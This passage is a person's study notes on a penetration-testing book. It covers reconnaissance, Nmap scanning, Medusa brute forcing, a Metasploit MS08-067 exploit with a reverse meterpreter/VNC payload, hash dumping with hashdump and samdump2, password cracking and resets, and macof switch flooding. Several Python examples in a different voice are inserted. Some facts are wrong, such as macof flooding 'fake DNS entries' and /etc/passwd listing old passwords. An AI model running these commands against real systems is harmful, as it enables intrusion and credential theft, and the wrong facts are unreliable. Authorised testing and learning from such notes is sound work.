The Basics of Hacking and Pen Testing

This document provides a summary of key topics from the book "The Basics of Hacking and Penetration Testing" including reconnaissance, scanning, exploitation, social engineering, and post exploitation techniques. It outlines tools that can be used at each stage of a penetration test from passive information gathering to maintaining access after exploitation. The document is intended as a quick reference guide for the reader rather than a replacement for reading the original book.


J J v1.1
18/01/2016

The Basics of Hacking and Penetration Testing
Notes on the excellent book by Patrick Engebretson

https://www.amazon.co.uk/Basics-Hacking-Penetration-Testing-Ethical/dp/0124116442/

NOTES

- There may be additional methods/techniques required for use against modern systems.
- These are my hacky notes. This document will not be perfect.
- Even if you read this, I would still recommend reading the book itself. It’s excellent!
- This knowledge is largely that of the author. At this point in time, I have had little practice.
  This document is my way of having a quick reference. The ‘Red Team Field Manual’ is also
  good as a quick reference.

Table of Contents

- Steps, p. 4
- Authorization, p. 4
- Reconnaissance (Passive and Active), p. 5
  - Definitions, p. 5
  - Aim/Purpose of Recon, p. 5
  - Google, p. 5
  - Search Engine Directives Search (Johnny Long’s fame), p. 6
  - Research Associates of Merged Companies, p. 6
  - HTTRACK, p. 6
  - Other Online Sources, p. 7
  - Social Media, p. 7
  - The Harvester, p. 7
  - Whois.NET and Netcraft, p. 8
  - DNS, p. 8
  - NsLookup, p. 8
  - Dig - Attempting Zone Transfer, p. 9
  - Fierce, p. 9
  - Email Server, p. 9
  - Metagoofil, p. 9
  - Threat Agent, p. 10
  - Social Engineering, p. 10
  - Roundup, p. 10
- Scanning, p. 11
  - Aim of Scanning, p. 11
  - Definitions, p. 11
  - Overview, p. 12
  - Ping (Single), p. 13
  - Ping (Multiples), p. 13
  - Port Scanning, p. 13
  - TCP Connect Scans, p. 14
  - SYN Scans, p. 14
  - UDP Scans, p. 15
  - XMAS Tree Scans and Null Scans, p. 15
  - Scripting NMAP, p. 16
  - Telnet / SSH, p. 16
  - Vulnerability Scanning, p. 16
- Exploitation, p. 18
  - Aim, p. 18
  - Brute Force Accessing Remote Services with Medusa / Hydra, p. 18
  - Metasploit, p. 19
  - More password cracking – Local – Samdump2 and John (JtR), p. 21
  - Password Cracking – Remote, p. 22
  - Sniffing Network Traffic, p. 22
  - Armitage – The Hail Mary, p. 23
- Social Engineering, p. 24
  - Aim, p. 24
  - SET – Social Engineering Toolkit, p. 24
- Web Exploitation, p. 25
  - Nikto Web Server Vuln Scanning, p. 25
  - W3AF – Finding standard weaknesses, p. 25
  - Webscarab (Full Spidering), p. 25
  - ZAP Spidering, Proxies and Man-In-The-Middle, p. 26
  - Injection attacks, p. 26
  - XSS – Cross Site Scripting, p. 26
- Post Exploitation – Maintaining Access, p. 27
  - Aim, p. 27
  - NetCat and CryptCat, p. 27
  - Rootkits, p. 27
  - Defending against rootkits, p. 28
- Report, p. 29
  - Executive Summary, p. 29
  - Walkthrough Report, p. 29
  - Detailed Report, p. 30
  - After Care, p. 30

Steps

1. Authorization
2. Reconnaissance (including research, scanning, vulnerability scanning)
3. Exploitation
4. Post Exploitation (keeping a back door open)
5. Black Hat – Hiding
6. White Hat – Reports (Management Overview and Technical Report)

A full pentest standard can be found at http://www.pentest-standard.org. This is a trimmed down
set of steps.

Authorization

- For white hat hacking, we need permission for the pen test.
- Scope must be agreed (on/off limits), especially with regard to maintaining back doors and
  rootkits.
- Scope can be expanded, but must be signed off again before progressing.
- Should have insurance in case you accidentally trash their systems.
- Everything must remain confidential.

Reconnaissance (Passive and Active)


Although often overlooked, thorough reconnaissance is the most important step of a good pen test.

Definitions

Passive Reconnaissance – Gather data about the client, but without making direct contact. This is
largely untraceable.

Active Reconnaissance – Gathering data from the client e.g. directly from their website/servers, or
by contacting them.

Aim/Purpose of Recon

The main goals are to acquire IP addresses, email addresses and, if possible, logins.

Remember that email addresses are often closely linked with domain names, so they could give us
logins. E.g. [email protected] could have a login of the email address, or ben.owned2, ownedb,
ownedb2 etc. There are tools to help us work out domain accounts from emails (see later on).

Remember when researching people that little details can lead to big clues. Someone’s Facebook
post or tweet could give away the starter for a password.

At the end, you should have clear separate lists of:

- IPs
- Email addresses
- Host names
- URLs
- User names
- Additional relevant information

Google

Google the company. Gather as much detail about them as possible. E.g.

- What they do
- Where they’re based
- Contact details
- Employee details
- Boss details (esp. small companies, the boss probably still has access!)
- Other relevant info

Search Engine Directives Search (Johnny Long’s fame)

Use Google search directives to get more information. Some searches are now blocked, so you need
to be inventive.

e.g. site:dsu.edu filetype:xlsx

e.g. site:syngress.com intitle:"index of" (directory listings of files not necessarily in a normal search)

Excel files often have interesting information. Other good terms:

- allintitle: or intitle:"index of" (public folders)
- inurl:admin (probably blocked now, but other words won’t be)
- cache:domain (view the cached version of the site, so you don’t interact with the client directly)
- filetype:pdf

Research Associates of Merged Companies

As the title suggests, research merged companies. These may have access to the IT infrastructure.
Mergers always lead to holes in the infrastructure.

HTTRACK

HTTRACK creates a copy of the client’s website. You can then do further recon/scanning of their site
offline. THIS IS TRACEABLE.

Good details to discover:

- EMAIL ADDRESSES!!!!
- IP addresses!!!! (possibly in Excel, PPT, Word or PDFs)
- Employee names (esp. tech staff)
- Social media accounts (esp. of employees)
- Physical address
- Location
- Phone
- Business hours (so we can hack them out of hours, or contact them during work hours)
- Business relationships (who they do business with)
- Mergers and acquisitions (more routes in for the future)
- Job adverts with details of their tech stack/firewalls. Can also get this from job sites
- robots.txt

Other Online Sources

Forums, newsgroups, bulletin boards and even live chat could reveal info about their software,
hardware, email addresses and configs.

Social Media

People give away tons of details on social media. Investigate employees’ Facebook, Twitter,
Instagram etc. You might find revealing tweets (“Battling with Cisco all day”; thank you!) or info about
them that could lead to passwords.

LinkedIn will be a big source of information too.

The Harvester

Use ‘The Harvester’ or another email scraper to get company email addresses. It’s built into Kali.
Keep it updated.

Cmd: theharvester
Cmd: updatedb
Cmd: locate theharvester (to find the harvester folder, e.g. /usr/bin/theharvester, if it is not working by default)

Cmd: ./theharvester.py -d syngress.com -l 10 -b all

-d = domain
-l = number of results to get
-b = search engine. Could be google, bing, yahoo, PGP?, LinkedIn

Whois.NET and Netcraft

Whois should be built into Kali.

Cmd: whois syngress.com

Can also visit the website. You might get the DNS lookup returned, for which you will need the host
command to get the IP. If you get a server name/referral URL, use their whois service to get more
info.

Can use the website: http://whois.domaintools.com.

http://news.netcraft.com will give you IPs, DNS settings and operating systems.

If you get host names rather than IPs from whois/netcraft, you can use the host command to get IPs.
The IP can also be used to get the host, but generally the query will look like:

Cmd: host ndl.dreamhost.com -a

-a = optional switch to get more info.

To get all options, use man host.

DNS

We hope one of these will be the company’s DNS server. DNS servers are important as they contain
a list of IPs we can target. Companies’ DNS systems are often weak. Admins know that if they mess up
the DNS, bad things happen, so they can be wary of touching it, leaving it unpatched and vulnerable.

DNS servers use zone transfer to share/sync their records with other DNS servers. We may be able
to perform a zone transfer, but it is now much harder to do. If we could do a zone transfer, it would
give us all IP mappings for the company. Even if the transfer fails, it’s worth investigating.

NsLookup

Use nslookup to find DNS records with revealing target info.

Cmd: nslookup
> server 8.8.8.8
> set type=any

Google the different record types. For example, mx = mail server address.



Dig - Attempting Zone Transfer

Dig is good for attempting a zone transfer.

Cmd: dig @target_ip

Cmd: dig @192.168.1.23 example.com -t AXFR

-t AXFR = transfer request

(note: need to check spacing between IP and domain name)

It is likely this will be blocked, but we may just get a list of host/IP addresses. Do this for all IP
addresses. Not completely sure how we know which is the DNS server, so trying all for the moment.

Fierce

May need to install this via apt-get install fierce. Fierce will attempt a zone transfer. It will then
attempt to brute force host names by sending queries to the server. This uncovers additional targets
e.g. mail.example.com. Presumably “man fierce” shows more options, but the basic is:

Cmd: cd /usr/bin/fierce
Cmd: ./fierce -dns example.com

Email Server

We can get information about the company’s setup from emails. We could send in a sales request
and then check the headers on the returned mail. Alternatively we could send an email with an
empty .bat or .exe file attached. The email server will hopefully reject it. Good email servers will quietly
swallow this, but less secure ones will return a reject email including info such as headers (from
which we can get the IP), server branding and anti-virus brand.

Metagoofil

Metagoofil searches the internet for metadata about the target, e.g.

- User names
- Computer/server names
- Network paths/file shares
- IPs?

It downloads files to your PC.

Cmd: cd /usr/bin/metagoofil
Cmd: mkdir mytargetfiles
Cmd: ./metagoofil.py -d syngress.com -t pdf,doc,xls,pptx -n 20 -o mytargetfiles -f results.html

./ = current directory

-d = domain switch
-t = file types
-n = number of each file type to report on
-o = save to this folder
-f = output summary to here.

If all we got back from this was a directory path, it could still tell us a username and OS.

For Windows, Search Diggity and FOCA are also useful for this.

Threat Agent

http://www.threatagent.com

Threat Agent does a lot of harvesting for you. Sign up for a free account. Enter the target organisation or
domain. It emails you info: IPs, email addresses, contacts, even open ports. Highly recommended by
Patrick Engebretson. Creates an entire dossier for you!

Social Engineering

Social engineering is about exploiting human weaknesses. More on this later. For example, a
conversation with someone from the company could reveal a lot, and an email to the sales team could
reveal IPs.

Could impersonate someone on holiday, or drop carefully labelled USB sticks (Annual Reports, Company
Salaries, Employee Reviews!) around in the hope someone will put one into their laptop. This would run a
script enabling us access to the system, opening a back door and dialling home to the attacker.

Need to be very careful. You often only get one chance, and once the alarm is sounded, everyone gets
suspicious.

Roundup

At the end of the reconnaissance, you should compile your results into the list of items shown in the
Aim/Purpose of Recon section.

Scanning

Aim of Scanning

The purpose of scanning is to:

1. Map IP addresses to open ports and services (potentials for exploit)
2. Potentially create an internal network map to discover critical infrastructure.

At the end of this step, you should have:

1. A list of open ports and services for each IP.
2. Vulnerabilities associated with the IP/port/service.

Every port is a potential gateway to our target system. See p56 or Google for commonly open
ports/services.

Make special notes of any IP address that includes some type of remote access service (e.g. SSH, FTP,
PCAnywhere, VNC, RDP) as these will help ‘own’ a system.

Even if the open system is a perimeter device and not the ‘gold’ target, it may be worth pivoting
from it to get there. It might encounter fewer restrictions, or be able to discover other
machines/devices.

Definitions

Perimeter devices – computers, servers, routers, firewalls or other equipment which sits at the outer
edge of a protected network.

ICMP – Internet Control Message Protocol packet

TCP – Transmission Control Protocol. Connection oriented protocol, meaning data is delivered in the
order it was sent, and packets are ensured to be received.

UDP – User Datagram Protocol. Connectionless protocol. Packets can arrive in any order, and the sender
has no means of knowing/ensuring all packets were received at the other end.

DOS – Denial of Service



Overview

1. Determining if a system is alive with PING packets
2. Port scanning with Nmap
3. Using Nmap to get more information
4. Get available vulnerabilities with Nessus (vulnerability scanning).

NOTE: Some companies will turn off PING responses (ICMP packets), so don’t worry too much if
there’s nothing for step 1; Nmap/Nessus might provide something later. If we can ping, they
probably haven’t secured this server very well.

Ping (Single)

Try sending an ICMP echo request packet to test if a computer is on and responding.

Cmd: ping target_ip

NOTE: Windows pings will send 4 packets, Linux pings will continue until you stop them (Ctrl+C).

If it’s offline or blocking ICMP packets, you will see 100% loss or ‘destination host unreachable’.

Ping (Multiples)

fping will save manually pinging each IP. Use something along the lines of the following to ping a
range. Note: look up comma separated lists or reading from a file in case the company does not have a
contiguous range (Cmd: “man fping”).

Cmd: fping -a -g 172.16.45.1 172.16.45.254 > savedfile.txt

-a = only show live hosts in output
-g = range to sweep
> = output to file

Can view the file in its location or by using “cat savedfile.txt”.

Port Scanning

The purpose of scanning is to identify open ports and the services running on the target system, e.g.
email, FTP, printing, web server. For example, if we find port 80 is open, it is likely it is a web server.

There are 65,536 ports on every computer, for each of TCP and UDP.

Nmap is a very good tool for this (www.insecure.org).

The basic process is the three way handshake:

- C1 sends a SYN packet to C2 on a specific port number
- If C2 is listening, it will respond with a SYN/ACK
- C1 receives the SYN/ACK and responds with an ACK
- Normal communication ensues.

TCP Connect Scans

Good as it gracefully completes the handshake (stable, less chance of a crash). If you don’t specify a port,
Nmap will scan the 1000 most common.

Cmd: nmap -sT -p- -Pn 192.168.18.132

-s = type of scan to run
-sT = TCP Connect Scan
-p- = scan all ports, not just the top 1000
-Pn = skip host discovery and scan all as if they were alive.

If you put -254 on the end of the target (192.168.18.1-254), it will scan 192.168.18.1 to 192.168.18.254.

Can also import targets from a text file to save running many scans! (The -iL switch; see man nmap.)

SYN Scans

The default type. Faster than TCP connect, with little chance of DOS’ing the server. Only completes
the first 2 parts of the handshake. The equivalent of a prank call to see if the user answers. Also
stealthier than TCP connect: as the connection is never completed, there is a small chance it won’t be
logged.

Cmd: nmap -sS -p- -Pn 192.168.18.132

Don’t actually need the -sS switch here, as it is the default.

NOTE: -sV would be a version scan and -T<0-5> (5 fastest) sets the speed of the scan. Faster =
less accurate.

UDP Scans

Many services use UDP including:

- Dynamic Host Configuration Protocol (DHCP)
- DNS (Domain Name System, for individual lookups)
- Simple Network Management Protocol (SNMP)
- Trivial File Transfer Protocol (TFTP)

Scanning is slow (10 seconds per IP), so it is probably OK to scan the top 1000 ports rather than all of them!

It is also rare for a server to return a message. Most likely the firewall will swallow it, giving us a
response of ‘open|filtered’. For this reason, we also use the version flag in Nmap to try to elicit a
better response.

Nmap for UDP

Cmd: nmap -sUV 172.16.45.135

-s = type of scan to run
U = UDP
V = version (additional trick to try to elicit info)

XMAS Tree Scans and Null Scans

Both of these violate the TCP RFC (request for comment) and can find stuff TCP scans do not, but DO NOT WORK
ON WINDOWS.

They rely on the behaviour the RFC specifies for a port: a closed port answers with a RST, an open port
stays silent. ONLY works on UNIX and Linux, which follow the RFC; Windows answers RST either way.

Xmas Tree (all flags on – FIN, PSH, URG)

Cmd: nmap -sX -p- -Pn 192.168.18.132

Open port – no response, closed port – RST (reset) packet returned.

Null Scan (all flags off)

Cmd: nmap -sN -p- -Pn 192.168.18.132

Open port – no response, closed port – RST (reset) packet returned.
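To make the open/closed/filtered outcomes of the connect, SYN, UDP, Xmas and Null scans above concrete, here is an added Python model (not code from the book or these notes) of the reply rules Nmap applies. The ‘rfc’ and ‘windows’ host stacks are simplified assumptions, and the version_probe flag stands in for what -sV does on an open UDP port.

```python
from dataclasses import dataclass
from typing import Optional, Tuple

# TCP header flag bits (RFC 793)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flags set on the probe each Nmap scan type sends
PROBE_FLAGS = {"connect": SYN, "syn": SYN, "xmas": FIN | PSH | URG, "null": 0}

# ICMP type 3 (destination unreachable) codes that Nmap reports as "filtered"
FILTERED_UNREACHABLE = {1, 2, 3, 9, 10, 13}


@dataclass
class Reply:
    """What the target sent back for one probe (all defaults = silence)."""
    tcp_flags: Optional[int] = None
    icmp: Optional[Tuple[int, int]] = None   # (type, code) of an ICMP error
    udp_payload: bool = False                # a UDP datagram came back


NO_REPLY = Reply()


def classify(scan: str, reply: Reply) -> str:
    """Port state Nmap would report for a probe of type `scan` and this reply."""
    if reply.icmp is not None:
        icmp_type, icmp_code = reply.icmp
        if scan == "udp" and (icmp_type, icmp_code) == (3, 3):
            return "closed"          # port unreachable: nothing is listening there
        if icmp_type == 3 and icmp_code in FILTERED_UNREACHABLE:
            return "filtered"        # a firewall/router refused the probe outright
    if scan in ("connect", "syn"):
        flags = reply.tcp_flags or 0
        if flags & SYN and flags & ACK:
            return "open"            # step 2 of the three way handshake came back
        if flags & RST:
            return "closed"
        return "filtered"            # silence: something dropped the SYN
    if scan in ("xmas", "null"):
        if reply.tcp_flags is not None and reply.tcp_flags & RST:
            return "closed"          # RFC 793: a closed port answers RST
        return "open|filtered"       # an open port ignores the probe, so does a firewall
    if scan == "udp":
        return "open" if reply.udp_payload else "open|filtered"
    raise ValueError(f"unknown scan type {scan!r}")


def host_reply(stack: str, scan: str, port_open: bool, version_probe: bool = False) -> Reply:
    """Assumed model of how a target answers. 'rfc' follows RFC 793; 'windows' sends
    RST to any odd flag combination on any port, so Xmas/Null see every port as closed."""
    if scan in ("connect", "syn"):
        return Reply(tcp_flags=SYN | ACK) if port_open else Reply(tcp_flags=RST)
    if scan in ("xmas", "null"):
        if stack == "windows" or not port_open:
            return Reply(tcp_flags=RST)
        return NO_REPLY
    if scan == "udp":
        if not port_open:
            return Reply(icmp=(3, 3))
        # An open UDP service usually stays silent unless it receives a payload it
        # understands, which is what version probing (-sV) sends it
        return Reply(udp_payload=True) if version_probe else NO_REPLY
    raise ValueError(f"unknown scan type {scan!r}")


def scan_port(stack: str, scan: str, port_open: bool, version_probe: bool = False) -> str:
    """Run one simulated probe against the modelled host and classify the result."""
    return classify(scan, host_reply(stack, scan, port_open, version_probe))


if __name__ == "__main__":
    for stack in ("rfc", "windows"):
        for scan in ("syn", "xmas", "null", "udp"):
            print(f"{stack:8}{scan:6} open -> {scan_port(stack, scan, True):14}"
                  f" closed -> {scan_port(stack, scan, False)}")
```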


Scripting NMAP

NSE – Nmap Scripting Engine, built into Nmap, provides a lot of additional functionality. Large
community with scripts available. Review the docs for each script before running:
http://nmap.org/nsedoc.

Can run a single script or a whole category. Huge functionality, can even exploit. Check the docs, but
examples:

Cmd: nmap --script banner target_ip (prints the banners returned by TCP services)

Cmd: nmap --script vuln target_ip (vulnerability scanner)

Check out ‘Common Vulnerabilities and Exposures’ (CVE), Open Source Vulnerability Database
(OSVDB) or the links provided.

Telnet / SSH

With your list of IPs/ports, you may be able to log into any remote access services using the default
username and password. Unlikely, but always worth a try.

Cmd: telnet target_ip
Cmd: ssh root@target_ip

Vulnerability Scanning

Nessus is a good tool for this. May need to register for a non-commercial HomeFeed key from
nessus.org. Keep plugins updated.

Install (p73)

Cmd: apt-get install nessus
Cmd: /opt/nessus/sbin/nessus-adduser (add username and password)
Cmd: /opt/nessus/bin/nessus-fetch --register your_reg_key
Cmd: /etc/init.d/nessusd start
// Nessus server now running… go to https://127.0.0.1:8834 and ignore the SSL warnings.

NOTE: in the Nessus config, make sure you check “Safe Checks”. Some vuln plugins will actually
exploit the target. We don’t want that yet.

If you have problems, make sure you restart the service (last call above).

Click Scans > New Scan and fill in the form. Make sure you name it well for future reference. If you
have a text file of IP addresses (which you should!), you can load it.

The results will show you known vulnerabilities found by the scan (e.g. p89), which you can use in
the exploitation step. E.g.

Critical: MS08-067 Microsoft Windows Server Service Crafted RPC

In Nessus, you can click on the vulns found for details.

OpenVAS is like Nessus and can also be handy. We will just use Nessus.

Exploitation

Aim

The aim of exploitation is ideally to gain control of a machine with admin privileges. May get some or
all of the way there. For example, you may not get admin access, but may still be able to download
files.

At the end of this step you should have:

- Evidence the system was compromised.

Brute Force Accessing Remote Services with Medusa / Hydra

Using some user names (and system guesses) a password cracker can be used to attempt to log in.
Many systems now include some form of password throttling to limit the number of attempts. After x
fails, your IP may be blocked, or the user locked out.

For online password cracking, Medusa and Hydra are well known. For Medusa, you need the IP address, a
user name / user name list, a password or dictionary file containing passwords, and the name of the
remote access service (RAS) you are attempting to authenticate with.

Good password dictionaries are streamlined and free of duplication. Kali has one at
/usr/share/wordlists (taken from a large data breach). Also a small but useful one at
/usr/share/john/password.lst.

If you don’t have a list of usernames, but did manage to get email addresses, Medusa can create a
list of potential usernames from this. Checking in the manual, but couldn’t see how.

Once this is done, you can use the list to brute force your way into the remote access service.

Cmd: medusa -h 192.168.18.132 -u ownedb -P /usr/share/john/password.lst -M ssh

-h = host
-u = username (-U = path to username list)
-p = password (-P = path to password list)
-M = service to attack
-n = non standard TCP port number (found in “man medusa” – also some options for parallelisation,
which may be default in Hydra)

When it finds a working password, the system will stop and tell you. Your pen test may be complete
at this point (depending on the scope).
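The throttling and lockout mentioned above work on the defender's side by counting failed logins per source within a time window. The following added Python example (not code from the book or these notes) does that over constructed sshd auth.log lines, and also flags an accepted login that follows a burst from the same source, which is the moment the account should be treated as compromised. It assumes the Debian-style sshd log line format and the year 2016 for the timestamps.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Line shape written by OpenSSH to auth.log on Debian-style systems (assumed format;
# syslog omits the year, so one is supplied when parsing)
LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

# Constructed sample log: a dictionary run from one source, then a success, then two
# unrelated failures far apart in time
SAMPLE_LOG = """\
Jan 18 10:00:01 bastion sshd[2101]: Failed password for invalid user admin from 192.168.18.130 port 51234 ssh2
Jan 18 10:00:02 bastion sshd[2102]: Failed password for invalid user test from 192.168.18.130 port 51235 ssh2
Jan 18 10:00:03 bastion sshd[2103]: Failed password for ownedb from 192.168.18.130 port 51236 ssh2
Jan 18 10:00:04 bastion sshd[2104]: Failed password for ownedb from 192.168.18.130 port 51237 ssh2
Jan 18 10:00:05 bastion sshd[2105]: Failed password for ownedb from 192.168.18.130 port 51238 ssh2
Jan 18 10:00:06 bastion sshd[2106]: Accepted password for ownedb from 192.168.18.130 port 51239 ssh2
Jan 18 10:07:00 bastion sshd[2200]: Failed password for alice from 10.0.0.5 port 40000 ssh2
Jan 18 10:30:00 bastion sshd[2300]: Failed password for alice from 10.0.0.5 port 40001 ssh2
""".splitlines()


def parse_logins(lines, year=2016):
    """Return (timestamp, outcome, user, source_ip) for every password login line."""
    events = []
    for line in lines:
        m = LOGIN_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["outcome"], m["user"], m["ip"]))
    return sorted(events, key=lambda e: e[0])


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Map source_ip -> {'first_seen', 'users'} for sources whose failed logins reach
    `threshold` within any sliding `window`: the same rule a lockout policy keys on."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    users = defaultdict(set)      # ip -> user names tried
    alerts = {}
    for ts, outcome, user, ip in parse_logins(lines):
        if outcome != "Failed":
            continue
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while ts - q[0] > window:  # q always holds ts itself, so it never empties
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {"first_seen": q[0], "users": sorted(users[ip])}
    return alerts


def successes_after_burst(lines, alerts):
    """(source_ip, user) pairs that logged in successfully from a flagged source after the
    burst began; these credentials should be reset, not just the source blocked."""
    return [(ip, user) for ts, outcome, user, ip in parse_logins(lines)
            if outcome == "Accepted" and ip in alerts and ts >= alerts[ip]["first_seen"]]


if __name__ == "__main__":
    found = detect_bruteforce(SAMPLE_LOG)
    for ip, info in found.items():
        print(f"brute force from {ip} starting {info['first_seen']}: users {info['users']}")
    for ip, user in successes_after_burst(SAMPLE_LOG, found):
        print(f"credential likely compromised: {user} from {ip}")
```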

Metasploit

This is a beast, with whole books on how to use it. It can add users, open backdoors and install software
onto a target machine.

Start Metasploit and get it ready to use with:

Cmd: msfconsole
Cmd: msfupdate

To use Metasploit properly, you need to match a known vulnerability with an exploit. High or critical
vulnerabilities often allow root access / remote code execution.

1. Take the vuln code from Nessus/Nmap and use the search function for a matching exploit

Cmd: search MS08-067

You can also search dates, e.g. search 2015.

Metasploit returns the name, location and a rank based on success/usefulness: 1 = rubbish,
7 = ace. See p90 for search.

2. Start a series of commands to run the exploit

Cmd: use exploit/windows/smb/ms08_067_netapi

3. View payloads (review docs for info)

Cmd: show payloads

4. Select a payload (review docs for info – in this case, it will install VNC remote control and
have it connect back to us). Remember VNC needs a GUI based OS. See next page for
meterpreter payloads.

Cmd: set payload windows/vncinject/reverse_tcp

5. Show options again and set the rest. Make sure they are all set!!! In this case we have 2
options that need filling

Cmd: show options
Cmd: set RHOST 192.168.18.131 (this is the remote server – target)
Cmd: set LHOST 192.168.18.130 (this is your IP)

6. Do a show options again to make sure you’re not missing anything.

7. Exploit it!

Cmd: exploit

More realistic payloads for Metasploit p95. Bind payloads send an exploit and make a connection to
the target machine. Reverse payloads send the exploit, then have the remote machine connect back.

Good Metasploit payloads that install meterpreter on the target:


Windows/meterpreter/bind_tcp
Windows/meterpreter/reverse_tcp

Meterpreter is a powerful shell. It runs in memory so stealthy. Will try to gain admin access, but will
be restricted if the service exploited does not have privileges.

Meterpreter commands

‘migrate’ – migrate the meterpreter into another process, e.g. svchost.exe, to avoid it being shut down
by a reboot.

‘cat’ – list the file contents on the screen

‘download’ – pull a file from the target

‘hashdump’ – get password hashes from the computer. Hashdump is important for getting better
privileges on that machine. This means if your first login had little privileges, all is not lost – you
might still get admin access yet. Once you have that admin password, it could well be the same for
other accounts!

Other commands: upload, edit, kill (to stop a process, e.g. antivirus), plus the standard ones such as cd and
mkdir. You can also interact with a Ruby shell.

More password cracking – Local – Samdump2 and John (JtR)

General process for cracking local passwords:

1. Shut down target
2. Boot alternate OS via CD or USB
3. Mount the local hard drive
4. Use Samdump2 to extract the hashes
5. Use JtR, RainbowCrack or something similar to crack the passwords

In Windows, under C:\Windows\System32\Config, there is a SAM file. This contains all the usernames and
password hashes. It is encrypted, and it is also locked once the system has booted.

Need to boot Kali or a similar OS from CD or Pen Drive. Might need UNetBootin
(https://unetbootin.github.io/). You may also need to change the boot order first.

Once you’re up and running, mount the drive. You may need to run ‘fdisk -l’ to work out
which partition to mount, and you may need to create the mount point first with ‘mkdir /mnt/sda1’.

Cmd: mount /dev/sda1 /mnt/sda1


Once it’s mounted, navigate to the correct drive.

Cmd: cd /mnt/sda1/Windows/system32/config

Then use Samdump2 to extract the hashes and make sure you have a local copy…

Cmd: samdump2 system SAM > /tmp/hashes.txt


Cmd: cat /tmp/hashes.txt

Then you need to email the hashes.txt file or find another way of getting it to yourself, as the live USB will not
be persistent!

Can then set about cracking the passwords, either with a good dictionary, or a brute force cracker
(aaa, aab, aac…).

John (JtR) is a good tool for password cracking.

Cmd: john /tmp/hashes.txt --format=nt


Don’t necessarily need the format, but good practice to ensure the settings are right.

OS X/ Linux Notes: passwords held in a ‘shadow’ file located at /etc/shadow. Only privileged users
can access it, but /etc/passwd may have a list of old passwords which we can get to and then make
educated guesses about the new password.

Instead of samdump, use

Cmd: unshadow /etc/passwd /etc/shadow > /tmp/hashes.txt



Password Cracking- Remote

Usually done once you have gained access to a machine. Get the hashes by using command
‘hashdump’ from a meterpreter shell. These can usually be copied and pasted from the terminal.

One of the key benefits of doing this is privilege escalation. If your lowly user is
lacking rights, the hashdump may give you the details of other users with more rights.
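The two hash-dumping routes above (samdump2 on a mounted disk, hashdump from meterpreter) both produce pwdump-style lines, and the notes' point that an admin password "could well be the same for other accounts" is something you can check directly from that file without cracking anything. The following is an added example (not from the book or these notes): it parses the `user:RID:LM:NT:::` format and reports accounts that share an NT hash (same password), accounts with a blank password, and accounts still storing an LM hash. The dump is constructed; only the two empty-hash constants are real, well-known values.

```python
"""Audit a pwdump-format hash file for shared, blank and LM-stored passwords.

samdump2 and meterpreter's hashdump both emit  user:RID:LM_hash:NT_hash:::  lines.
Two accounts with the same NT hash have the same password, which is exactly the
reuse risk a defender wants to find before an attacker does. Sample data below
is constructed, apart from the two well-known empty-hash constants.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (LM hashing disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "" (blank password)

# Constructed sample dump; the non-empty NT/LM hashes are arbitrary hex, not real hashes.
CONSTRUCTED_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
jsmith:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
svc_sql:1003:0123456789abcdef0123456789abcdef:abcdefabcdefabcdefabcdefabcdefab:::
"""


def parse_pwdump(text):
    """Return a list of {user, rid, lm, nt} dicts, skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        records.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records


def find_shared_passwords(records):
    """Map NT hash -> users, keeping only hashes that appear on two or more accounts."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {h: users for h, users in by_nt.items() if len(users) > 1}


def find_blank_passwords(records):
    """Accounts whose NT hash is the hash of the empty string."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]


def find_lm_hashes_present(records):
    """Accounts still storing a real LM hash (a weak format that should be disabled)."""
    return [r["user"] for r in records if r["lm"] != EMPTY_LM]


def audit(text):
    recs = parse_pwdump(text)
    return {"shared": find_shared_passwords(recs),
            "blank": find_blank_passwords(recs),
            "lm_present": find_lm_hashes_present(recs)}


if __name__ == "__main__":
    for finding, value in audit(CONSTRUCTED_DUMP).items():
        print(f"{finding}: {value}")
```

Run it against a real `hashes.txt` from an authorised engagement by replacing `CONSTRUCTED_DUMP` with the file contents; the "shared" finding is usually the one worth leading the report with, since it shows exactly which accounts fall together.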

Password Cracking – Password Resetting

Effective, but the user will definitely know you’ve been there. There’s no way to restore a SAM file.
Mount Kali as before, but instead of samdump, run

Cmd: chntpw -i /mnt/sda1/WINDOWS/system32/config/SAM

-i = run interactively so you can choose the user you’d like to reset.
Might need to run ‘fdisk -l’ to check you have the correct disk drive.

Follow the chntpw instructions. With a blank password, you’ll gain easy access. Will need to issue
‘reboot’ command first.

Sniffing Network Traffic

Use Wireshark, Dsniff and macof p113. Ettercap may also be handy.

Macof can be used to flood switches with fake DNS entries to force fail-open switches to broadcast
all traffic to all computers on the network. If the switches are fail-closed, this will effectively DoS
them.

It causes a lot of noise and is easily detectable.

e.g.

Cmd: macof -i eth0 -s 192.168.18.130 -d 192.168.18.2

-i = the network interface on your computer to use
-s = source address
-d = destination of attack
